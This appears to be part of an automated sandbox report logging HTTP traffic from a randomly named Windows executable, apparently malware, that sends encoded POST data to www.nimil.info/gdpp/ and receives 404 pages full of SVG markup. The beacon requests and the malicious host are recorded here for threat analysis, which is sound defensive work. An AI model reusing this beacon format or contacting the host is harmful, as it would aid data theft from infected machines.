                                                                                        Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="/42.css"></head><body>... partial:index.partial.html --><main> <svg viewBox="0 0 541.17206 328.45184" height="328.45184" width="541.17206" id="svg2" version="1.1"> <metadata id="metadata8"> </metadata> <defs id="defs6"> <pattern patternUnits="userSpaceOnUse" width="1.5" height="1" patternTransform="translate(0,0) scale(10,10)" id="Strips2_1"> <rect style="fill:black;stroke:none" x="0" y="-0.5" width="1" height="2" id="rect5419" /> </pattern> <linearGradient osb:paint="solid" id="linearGradient6096"> <stop id="stop6094" offset="0" [TRUNCATED]
                                                                                        Nov 14, 2024 08:17:16.548368931 CET1236INData Raw: 3e 0a 20 20 20 20 3c 2f 64 65 66 73 3e 0a 20 20 20 20 3c 67 0a 20 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 31 37 30 2e 31 34 35 31 35 2c 30 2e 30 33 38 31 36 34 29 22 0a 20 20 20 20 20 20 20 69 64 3d 22 6c
                                                                                        Data Ascii: > </defs> <g transform="translate(170.14515,0.038164)" id="layer1"> <g id="g6219" > <path transform="matrix(1.0150687,0,0,11.193923,-1.3895945,-2685.7441)" style="disp
                                                                                        Nov 14, 2024 08:17:16.548391104 CET424INData Raw: 38 2e 38 35 38 37 31 35 20 2d 30 2e 36 30 32 31 37 35 2c 2d 33 31 2e 34 36 39 32 32 38 20 2d 30 2e 30 31 32 35 33 2c 2d 32 32 2e 37 35 39 35 36 35 20 30 2e 37 31 37 32 36 32 2c 2d 34 31 2e 32 33 31 34 35 32 31 33 20 31 2e 36 32 38 39 39 35 2c 2d
                                                                                        Data Ascii: 8.858715 -0.602175,-31.469228 -0.01253,-22.759565 0.717262,-41.23145213 1.628995,-41.23195399 z" style="display:inline;fill:#000000;stroke:none;stroke-width:0.23743393px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;"
                                                                                        Nov 14, 2024 08:17:16.548407078 CET1236INData Raw: 35 39 31 2c 31 2e 31 37 38 30 31 20 2d 34 2e 38 36 31 34 34 34 2c 32 2e 36 38 31 31 33 20 2d 31 2e 33 35 35 38 35 33 2c 31 2e 35 30 33 31 32 20 2d 32 2e 34 37 33 37 36 34 2c 33 2e 30 39 31 37 33 20 2d 33 2e 33 38 37 38 36 36 2c 34 2e 35 39 35 33
                                                                                        Data Ascii: 591,1.17801 -4.861444,2.68113 -1.355853,1.50312 -2.473764,3.09173 -3.387866,4.59538 -0.914103,1.50365 -1.620209,2.91586 -2.416229,4.41952 -0.79602,1.50365 -1.67928,3.09352 -0.808656,3.24054 0.870624,0.14702 3.490408,-1.14815 5.700074,-1.91396
                                                                                        Nov 14, 2024 08:17:16.548424006 CET1236INData Raw: 20 2d 35 2e 35 38 33 38 32 33 2c 36 2e 36 36 37 31 39 20 2d 31 30 2e 37 34 39 36 35 35 2c 31 33 2e 36 36 36 30 35 20 2d 31 33 2e 39 31 36 36 30 38 2c 31 38 2e 37 34 39 36 20 2d 33 2e 31 36 36 39 35 32 2c 35 2e 30 38 33 35 35 20 2d 34 2e 33 33 33
                                                                                        Data Ascii: -5.583823,6.66719 -10.749655,13.66605 -13.916608,18.7496 -3.166952,5.08355 -4.333432,8.24971 -4.750315,11.08369 -0.416883,2.83399 -0.08368,5.33304 1.809372,16.25302 1.893048,10.91998 5.343489,30.24673 9.760132,48.66349 4.416642,18.41676 9.798
                                                                                        Nov 14, 2024 08:17:16.548439026 CET1236INData Raw: 37 20 31 39 2e 39 38 39 35 37 2c 31 39 2e 31 34 35 38 31 20 36 2e 31 39 37 38 36 2c 36 2e 32 32 39 31 32 20 31 31 2e 36 39 37 38 39 2c 31 32 2e 32 32 39 31 34 20 31 37 2e 31 31 34 35 36 2c 31 38 2e 33 39 35 38 31 20 35 2e 34 31 36 36 36 2c 36 2e
                                                                                        Data Ascii: 7 19.98957,19.14581 6.19786,6.22912 11.69789,12.22914 17.11456,18.39581 5.41666,6.16667 10.74996,12.49995 14.74993,17.91655 3.99997,5.41659 6.66659,9.91653 7.16671,17.83316 0.50012,7.91664 -1.16644,19.24921 -3.3502,31.24619 -2.18376,11.99698 -
                                                                                        Nov 14, 2024 08:17:16.548455000 CET1236INData Raw: 34 34 20 32 2e 34 37 34 37 37 2c 39 2e 36 36 33 31 20 31 2e 39 34 34 34 33 2c 32 33 2e 38 30 36 34 37 20 2d 30 2e 35 33 30 33 34 2c 31 34 2e 31 34 33 33 38 20 2d 32 2e 38 38 37 30 36 2c 33 36 2e 35 33 32 32 36 20 2d 35 2e 34 32 30 39 2c 35 36 2e
                                                                                        Data Ascii: 44 2.47477,9.6631 1.94443,23.80647 -0.53034,14.14338 -2.88706,36.53226 -5.4209,56.44951 -2.53383,19.91725 -5.24428,37.35836 -7.95503,54.80146" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;str
                                                                                        Nov 14, 2024 08:17:16.548470020 CET848INData Raw: 69 64 74 68 3a 31 70 78 3b 73 74 72 6f 6b 65 2d 6c 69 6e 65 63 61 70 3a 62 75 74 74 3b 73 74 72 6f 6b 65 2d 6c 69 6e 65 6a 6f 69 6e 3a 6d 69 74 65 72 3b 73 74 72 6f 6b 65 2d 6f 70 61 63 69 74 79 3a 31 3b 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20
                                                                                        Data Ascii: idth:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4545" d="m 83.12978,122.92016 c -2.601311,10.56131 -5.214983,21.17282 -7.40283,31.41665 -2.187847,10.24384 -3.955407,20.
                                                                                        Nov 14, 2024 08:17:16.548490047 CET1236INData Raw: 34 2c 31 31 2e 35 34 39 32 32 20 2d 31 2e 33 35 35 34 31 39 2c 32 34 2e 35 37 34 31 35 20 30 2e 39 34 32 39 37 34 2c 31 33 2e 30 32 34 39 33 20 32 2e 38 32 38 31 38 32 2c 33 34 2e 34 36 39 31 37 20 35 2e 30 36 36 30 39 35 2c 35 33 2e 38 34 37 34
                                                                                        Data Ascii: 4,11.54922 -1.355419,24.57415 0.942974,13.02493 2.828182,34.46917 5.066095,53.84746 2.237913,19.37829 4.833109,36.71892 7.425959,54.04387" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-
                                                                                        Nov 14, 2024 08:17:16.548504114 CET212INData Raw: 69 64 3d 22 70 61 74 68 34 35 32 39 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22 6d 20 31 33 32 2e 36 38 37 35 2c 32 36 33 2e 33 34 39 39 38 20 63 20 2d 34 2e 32 32 38 39 2c 31 38 2e 34 31 35 35 20 2d 38 2e 34 35 38 30 36 2c 33 36 2e 38
                                                                                        Data Ascii: id="path4529" d="m 132.6875,263.34998 c -4.2289,18.4155 -8.45806,36.83216 -12.6875,55.25" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linej
                                                                                        Nov 14, 2024 08:17:16.553365946 CET1236INData Raw: 6f 69 6e 3a 6d 69 74 65 72 3b 73 74 72 6f 6b 65 2d 6f 70 61 63 69 74 79 3a 31 3b 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 65 6c 6c 69 70 73 65 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 72 79 3d 22 34 2e 36 37 31 35 37 31 37 22 0a 20 20 20
                                                                                        Data Ascii: oin:miter;stroke-opacity:1;" /> <ellipse ry="4.6715717" rx="2.5" cy="238.08525" cx="119.12262" id="path4614" style="display:inline;opacity:1;fill:#000000;f


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        11192.168.2.563496203.161.46.205803720C:\Program Files (x86)\bUEsIrxBaWDdMskCSjpiUxeFwcAtuIPMltVJosLQWp\WKOyCvoOlM.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Nov 14, 2024 08:17:18.433614969 CET781OUTPOST /gdpp/ HTTP/1.1
                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                        Accept-Language: en-US,en;q=0.5
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Host: www.nimil.info
                                                                                        Cache-Control: no-cache
                                                                                        Connection: close
                                                                                        Content-Length: 225
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Origin: http://www.nimil.info
                                                                                        Referer: http://www.nimil.info/gdpp/
                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; Nexus 5 Build/LRX22C) AppleWebKit / 537.36 (KHTML, like Gecko) Chrome/43.0.2357.93 Mobile Safari/537.36
                                                                                        Data Raw: 71 62 36 68 3d 61 50 4e 72 6d 45 6c 71 79 47 2f 65 61 69 66 61 51 6c 61 48 4e 35 57 65 64 34 45 2f 4e 44 32 32 4c 4d 4b 50 4b 6e 56 61 2f 35 34 6c 52 5a 37 4e 6a 56 4e 42 41 6f 51 55 46 41 56 68 57 7a 58 6d 2f 5a 33 43 78 66 31 58 50 68 63 54 6e 56 36 2b 58 45 36 4d 5a 31 52 32 79 39 73 41 4d 2b 74 76 74 49 71 5a 47 52 58 73 41 73 53 44 53 5a 31 50 59 62 68 4e 54 42 73 30 68 75 68 6d 4d 48 70 4f 52 6f 6f 34 77 35 78 66 44 70 34 30 68 58 6c 76 7a 37 52 2b 73 78 49 52 36 4e 2b 4a 39 4d 68 75 4a 4e 46 52 4d 77 34 38 78 4b 32 63 77 70 2b 35 53 43 4a 48 31 6f 76 63 6e 48 39 4f 64 4b 4f 67 33 48 53 6d 69 32 5a 34 4d 61 76 36 48 73 52 66 46 2b 33 47 38 74 43 35 68 43 4b 64
                                                                                        Data Ascii: qb6h=aPNrmElqyG/eaifaQlaHN5Wed4E/ND22LMKPKnVa/54lRZ7NjVNBAoQUFAVhWzXm/Z3Cxf1XPhcTnV6+XE6MZ1R2y9sAM+tvtIqZGRXsAsSDSZ1PYbhNTBs0huhmMHpORoo4w5xfDp40hXlvz7R+sxIR6N+J9MhuJNFRMw48xK2cwp+5SCJH1ovcnH9OdKOg3HSmi2Z4Mav6HsRfF+3G8tC5hCKd
                                                                                        Nov 14, 2024 08:17:19.096184969 CET1236INHTTP/1.1 404 Not Found
                                                                                        Date: Thu, 14 Nov 2024 07:17:19 GMT
                                                                                        Server: Apache
                                                                                        Content-Length: 16052
                                                                                        Connection: close
                                                                                        Content-Type: text/html
                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 [TRUNCATED]
                                                                                        Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="/42.css"></head><body>... partial:index.partial.html --><main> <svg viewBox="0 0 541.17206 328.45184" height="328.45184" width="541.17206" id="svg2" version="1.1"> <metadata id="metadata8"> </metadata> <defs id="defs6"> <pattern patternUnits="userSpaceOnUse" width="1.5" height="1" patternTransform="translate(0,0) scale(10,10)" id="Strips2_1"> <rect style="fill:black;stroke:none" x="0" y="-0.5" width="1" height="2" id="rect5419" /> </pattern> <linearGradient osb:paint="solid" id="linearGradient6096"> <stop id="stop6094" offset="0" [TRUNCATED]
                                                                                        Nov 14, 2024 08:17:19.096223116 CET1236INData Raw: 3e 0a 20 20 20 20 3c 2f 64 65 66 73 3e 0a 20 20 20 20 3c 67 0a 20 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 31 37 30 2e 31 34 35 31 35 2c 30 2e 30 33 38 31 36 34 29 22 0a 20 20 20 20 20 20 20 69 64 3d 22 6c
                                                                                        Data Ascii: > </defs> <g transform="translate(170.14515,0.038164)" id="layer1"> <g id="g6219" > <path transform="matrix(1.0150687,0,0,11.193923,-1.3895945,-2685.7441)" style="disp
                                                                                        Nov 14, 2024 08:17:19.096240044 CET1236INData Raw: 38 2e 38 35 38 37 31 35 20 2d 30 2e 36 30 32 31 37 35 2c 2d 33 31 2e 34 36 39 32 32 38 20 2d 30 2e 30 31 32 35 33 2c 2d 32 32 2e 37 35 39 35 36 35 20 30 2e 37 31 37 32 36 32 2c 2d 34 31 2e 32 33 31 34 35 32 31 33 20 31 2e 36 32 38 39 39 35 2c 2d
                                                                                        Data Ascii: 8.858715 -0.602175,-31.469228 -0.01253,-22.759565 0.717262,-41.23145213 1.628995,-41.23195399 z" style="display:inline;fill:#000000;stroke:none;stroke-width:0.23743393px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;"
                                                                                        Nov 14, 2024 08:17:19.096255064 CET1236INData Raw: 30 2e 37 36 32 37 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 34 35 35 33 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 6f 70 61 63 69 74 79 3a 31 3b 66
                                                                                        Data Ascii: 0.76272" id="rect4553" style="display:inline;opacity:1;fill:#000000;fill-opacity:1;fill-rule:nonzero;stroke:#000000;stroke-width:1.00157475;stroke-miterlimit:4;stroke-dasharray:none;stroke-opacity:1;" /> <pa
                                                                                        Nov 14, 2024 08:17:19.096271992 CET848INData Raw: 32 2c 31 35 2e 35 30 30 36 34 20 30 2e 39 31 36 37 39 38 2c 36 2e 38 33 34 33 34 20 32 2e 32 34 39 38 35 34 2c 31 36 2e 33 33 32 33 37 20 33 2e 34 39 39 39 30 32 2c 32 34 2e 39 31 36 30 34 20 31 2e 32 35 30 30 34 37 2c 38 2e 35 38 33 36 38 20 32
                                                                                        Data Ascii: 2,15.50064 0.916798,6.83434 2.249854,16.33237 3.499902,24.91604 1.250047,8.58368 2.416611,16.24967 4.583438,28.58394 2.166827,12.33427 5.333153,29.33244 8.499966,46.33323" style="display:inline;fill:none;stroke:#000000;stroke-widt
                                                                                        Nov 14, 2024 08:17:19.096286058 CET1236INData Raw: 70 3a 62 75 74 74 3b 73 74 72 6f 6b 65 2d 6c 69 6e 65 6a 6f 69 6e 3a 6d 69 74 65 72 3b 73 74 72 6f 6b 65 2d 6f 70 61 63 69 74 79 3a 31 3b 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64
                                                                                        Data Ascii: p:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4525" d="m 91.9375,124.09998 c 5.854072,7.16655 11.70824,14.33322 16.21863,20.16651 4.51039,5.83328 7.67706,10.33329 11.92718,16.33346 4.25012
                                                                                        Nov 14, 2024 08:17:19.096301079 CET1236INData Raw: 30 35 2c 35 2e 38 30 34 31 36 20 31 2e 34 35 38 35 30 35 2c 36 2e 39 38 32 35 37 20 32 2e 34 30 32 30 32 31 2c 31 31 2e 31 31 30 35 32 20 30 2e 39 34 33 35 31 37 2c 34 2e 31 32 37 39 35 20 32 2e 38 32 37 35 33 35 2c 31 31 2e 31 39 33 30 32 20 34
                                                                                        Data Ascii: 05,5.80416 1.458505,6.98257 2.402021,11.11052 0.943517,4.12795 2.827535,11.19302 4.065005,16.02501 1.23748,4.832 1.82668,7.42447 2.12139,10.84263 0.29471,3.41815 0.29471,7.65958 -0.11785,20.44893 -0.41255,12.78934 -1.23731,34.11536 -2.18014,53
                                                                                        Nov 14, 2024 08:17:19.096316099 CET1236INData Raw: 33 39 20 31 2e 31 31 39 39 33 32 2c 31 39 2e 38 30 33 37 39 20 32 2e 34 31 35 35 37 34 2c 33 37 2e 30 30 30 34 39 20 33 2e 37 31 32 30 30 35 2c 35 34 2e 32 30 37 36 37 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70
                                                                                        Data Ascii: 39 1.119932,19.80379 2.415574,37.00049 3.712005,54.20767" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4549"
                                                                                        Nov 14, 2024 08:17:19.096333027 CET1236INData Raw: 3b 66 69 6c 6c 3a 6e 6f 6e 65 3b 73 74 72 6f 6b 65 3a 23 30 30 30 30 30 30 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 31 70 78 3b 73 74 72 6f 6b 65 2d 6c 69 6e 65 63 61 70 3a 62 75 74 74 3b 73 74 72 6f 6b 65 2d 6c 69 6e 65 6a 6f 69 6e 3a 6d 69 74
                                                                                        Data Ascii: ;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4560" d="m 13.113199,198.16821 c 47.547038,0.40361 95.093071,0.80721 142.638101,1.2108
                                                                                        Nov 14, 2024 08:17:19.096349955 CET848INData Raw: 70 61 63 69 74 79 3a 31 3b 66 69 6c 6c 2d 72 75 6c 65 3a 6e 6f 6e 7a 65 72 6f 3b 73 74 72 6f 6b 65 3a 23 30 30 30 30 30 30 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 30 2e 38 32 31 37 30 32 32 34 3b 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69
                                                                                        Data Ascii: pacity:1;fill-rule:nonzero;stroke:#000000;stroke-width:0.82170224;stroke-miterlimit:4;stroke-dasharray:none;stroke-opacity:1;" /> <ellipse transform="translate(-170.14515,-0.038164)" ry="3.880542"
                                                                                        Nov 14, 2024 08:17:19.101346016 CET1236INData Raw: 32 2c 30 2e 31 33 30 31 20 7a 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 6f 70 61 63 69 74 79 3a 31 3b 66 69 6c 6c 3a 23 30 30 30 30 30 30 3b 66 69 6c 6c 2d 6f 70 61 63 69 74 79 3a 31 3b 66 69 6c 6c 2d 72 75 6c 65 3a 6e 6f
                                                                                        Data Ascii: 2,0.1301 z" style="opacity:1;fill:#000000;fill-opacity:1;fill-rule:nonzero;stroke:#000000;stroke-width:1.00157475;stroke-miterlimit:4;stroke-dasharray:none;stroke-opacity:1;" /> <path transform="translate(-1


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        12192.168.2.563497203.161.46.205803720C:\Program Files (x86)\bUEsIrxBaWDdMskCSjpiUxeFwcAtuIPMltVJosLQWp\WKOyCvoOlM.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Nov 14, 2024 08:17:20.981636047 CET1798OUTPOST /gdpp/ HTTP/1.1
                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                        Accept-Language: en-US,en;q=0.5
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Host: www.nimil.info
                                                                                        Cache-Control: no-cache
                                                                                        Connection: close
                                                                                        Content-Length: 1241
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Origin: http://www.nimil.info
                                                                                        Referer: http://www.nimil.info/gdpp/
                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; Nexus 5 Build/LRX22C) AppleWebKit / 537.36 (KHTML, like Gecko) Chrome/43.0.2357.93 Mobile Safari/537.36
                                                                                        Data Raw: 71 62 36 68 3d 61 50 4e 72 6d 45 6c 71 79 47 2f 65 61 69 66 61 51 6c 61 48 4e 35 57 65 64 34 45 2f 4e 44 32 32 4c 4d 4b 50 4b 6e 56 61 2f 35 77 6c 52 71 44 4e 69 79 35 42 61 6f 51 55 4e 67 56 73 57 7a 58 37 2f 5a 50 47 78 66 34 69 50 6e 51 54 6d 32 79 2b 66 56 36 4d 4d 46 52 32 77 39 73 44 49 2b 74 36 74 49 36 64 47 52 48 73 41 73 53 44 53 61 64 50 66 4b 68 4e 56 42 73 37 6d 75 67 6e 61 48 6f 6e 52 6f 77 4f 77 34 46 50 66 4e 30 30 68 33 31 76 78 49 35 2b 78 68 49 70 39 4e 2b 52 39 4d 74 39 4a 4e 4a 33 4d 77 6b 61 78 49 6d 63 78 34 48 41 4a 77 68 52 32 61 36 77 6b 77 31 63 61 66 71 63 6f 55 69 50 75 46 74 4d 49 6f 43 59 4a 4a 6c 6a 42 2b 2f 49 6f 49 79 35 6e 53 33 2b 77 5a 38 63 54 58 79 45 76 6f 54 54 49 32 2f 72 32 74 44 4c 66 6a 48 6a 47 43 4d 35 68 61 67 4c 2b 2f 77 33 46 6a 42 54 42 68 52 68 6c 54 43 4a 6f 66 77 70 71 6e 70 46 2f 74 59 31 47 41 68 42 79 58 59 62 73 37 53 42 66 44 64 45 49 77 61 63 75 47 55 6b 36 5a 53 56 2f 57 50 74 72 47 32 6f 69 6e 58 59 30 76 2f 42 36 47 73 4b 43 6f 65 6c 4c [TRUNCATED]
                                                                                        Data Ascii: qb6h=aPNrmElqyG/eaifaQlaHN5Wed4E/ND22LMKPKnVa/5wlRqDNiy5BaoQUNgVsWzX7/ZPGxf4iPnQTm2y+fV6MMFR2w9sDI+t6tI6dGRHsAsSDSadPfKhNVBs7mugnaHonRowOw4FPfN00h31vxI5+xhIp9N+R9Mt9JNJ3MwkaxImcx4HAJwhR2a6wkw1cafqcoUiPuFtMIoCYJJljB+/IoIy5nS3+wZ8cTXyEvoTTI2/r2tDLfjHjGCM5hagL+/w3FjBTBhRhlTCJofwpqnpF/tY1GAhByXYbs7SBfDdEIwacuGUk6ZSV/WPtrG2oinXY0v/B6GsKCoelLc5YuuOV5jIgtSz+L7wj4kUcr/YMQlwg7/dhzAc10iRtSZfUL2rprsl2MQ/3Ywf4iOZZ+gFy6Wx9JMFP+BKcAFH4UvXuatX/lg50kdcTme1JWdpErq6rYLxCyXs9+dxG3MR1mXHhliKWcQTlfsflNrV3XvAVZF3YAbSag5M8Dscy4rf2EOO7GLTS7K9ARcMxwKbb7yyXdQoeugAZ6Hd7z1Pq89naT6GEFrQTNka0PCul807p2K9gS+fRm8tQS5tFSNqf9h+EORTtge/mPzA5SRPYa0Y46su+C33wroCYBCbjPGE0BmG3bsL9za8J4j9n4xTzpnEo3ppo3hDUhPh0uDEY/c78fLpU539HP8uVT8idz/JVByo4UyuejrYWjKx9ohX2r0rg7/qJ2JUH0Up+S+QJGM+zODKYQGkJW8qzNyyBC0dqC+9N058tKVyoqPbCIdFMnj8uwY/rCdyRJ+O47cWF0J99pa9vRA5L93uSSnqR6JST4qcJW90p80S1oOdoVFc6kSLdRJWTXJYP11B9i5ApILPWpJ+vCOgPSsu/2EzAvxtLxLxJeAVUPf579R9mRV7LphXBppAkHQoYtjLQpsW+i/8e2A6j44H4YsZ6qxVGu/lxLiPWmuTvkdBYYjAUpPjaUrUdqehA8o09hjvDK+YwWjHpNFFeM7m [TRUNCATED]
                                                                                        Nov 14, 2024 08:17:21.645406008 CET1236INHTTP/1.1 404 Not Found
                                                                                        Date: Thu, 14 Nov 2024 07:17:21 GMT
                                                                                        Server: Apache
                                                                                        Content-Length: 16052
                                                                                        Connection: close
                                                                                        Content-Type: text/html
                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 [TRUNCATED]
                                                                                        Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="/42.css"></head><body>... partial:index.partial.html --><main> <svg viewBox="0 0 541.17206 328.45184" height="328.45184" width="541.17206" id="svg2" version="1.1"> <metadata id="metadata8"> </metadata> <defs id="defs6"> <pattern patternUnits="userSpaceOnUse" width="1.5" height="1" patternTransform="translate(0,0) scale(10,10)" id="Strips2_1"> <rect style="fill:black;stroke:none" x="0" y="-0.5" width="1" height="2" id="rect5419" /> </pattern> <linearGradient osb:paint="solid" id="linearGradient6096"> <stop id="stop6094" offset="0" [TRUNCATED]
                                                                                        Nov 14, 2024 08:17:21.645431042 CET1236INData Raw: 3e 0a 20 20 20 20 3c 2f 64 65 66 73 3e 0a 20 20 20 20 3c 67 0a 20 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 31 37 30 2e 31 34 35 31 35 2c 30 2e 30 33 38 31 36 34 29 22 0a 20 20 20 20 20 20 20 69 64 3d 22 6c
                                                                                        Data Ascii: > </defs> <g transform="translate(170.14515,0.038164)" id="layer1"> <g id="g6219" > <path transform="matrix(1.0150687,0,0,11.193923,-1.3895945,-2685.7441)" style="disp
                                                                                        Nov 14, 2024 08:17:21.645445108 CET424INData Raw: 38 2e 38 35 38 37 31 35 20 2d 30 2e 36 30 32 31 37 35 2c 2d 33 31 2e 34 36 39 32 32 38 20 2d 30 2e 30 31 32 35 33 2c 2d 32 32 2e 37 35 39 35 36 35 20 30 2e 37 31 37 32 36 32 2c 2d 34 31 2e 32 33 31 34 35 32 31 33 20 31 2e 36 32 38 39 39 35 2c 2d
                                                                                        Data Ascii: 8.858715 -0.602175,-31.469228 -0.01253,-22.759565 0.717262,-41.23145213 1.628995,-41.23195399 z" style="display:inline;fill:#000000;stroke:none;stroke-width:0.23743393px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;"
                                                                                        Nov 14, 2024 08:17:21.645456076 CET1236INData Raw: 35 39 31 2c 31 2e 31 37 38 30 31 20 2d 34 2e 38 36 31 34 34 34 2c 32 2e 36 38 31 31 33 20 2d 31 2e 33 35 35 38 35 33 2c 31 2e 35 30 33 31 32 20 2d 32 2e 34 37 33 37 36 34 2c 33 2e 30 39 31 37 33 20 2d 33 2e 33 38 37 38 36 36 2c 34 2e 35 39 35 33
                                                                                        Data Ascii: 591,1.17801 -4.861444,2.68113 -1.355853,1.50312 -2.473764,3.09173 -3.387866,4.59538 -0.914103,1.50365 -1.620209,2.91586 -2.416229,4.41952 -0.79602,1.50365 -1.67928,3.09352 -0.808656,3.24054 0.870624,0.14702 3.490408,-1.14815 5.700074,-1.91396
